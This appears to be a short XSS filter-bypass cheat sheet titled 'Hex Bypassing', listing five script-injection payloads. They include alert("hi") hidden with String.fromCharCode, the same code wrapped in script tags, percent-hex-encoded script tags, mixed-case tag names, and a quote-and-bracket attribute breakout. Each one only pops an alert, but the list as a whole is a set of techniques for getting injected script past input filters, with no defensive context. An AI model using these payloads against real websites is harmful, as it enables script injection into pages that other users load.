=================================================================================


╦ ╦┌─┐─┐ ┬  ╔╗ ┬ ┬┌─┐┌─┐┌─┐┌─┐┬┌┐┌┌─┐
╠═╣├┤ ┌┴┬┘  ╠╩╗└┬┘├─┘├─┤└─┐└─┐│││││ ┬
╩ ╩└─┘┴ └─  ╚═╝ ┴ ┴  ┴ ┴└─┘└─┘┴┘└┘└─┘


=================================================================================



1 - String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)

2 - <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>

3 - %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e

4 - <ScRipt>ALeRt("hi");</sCRipT>

5 - "><script>alert("Hi");</script>

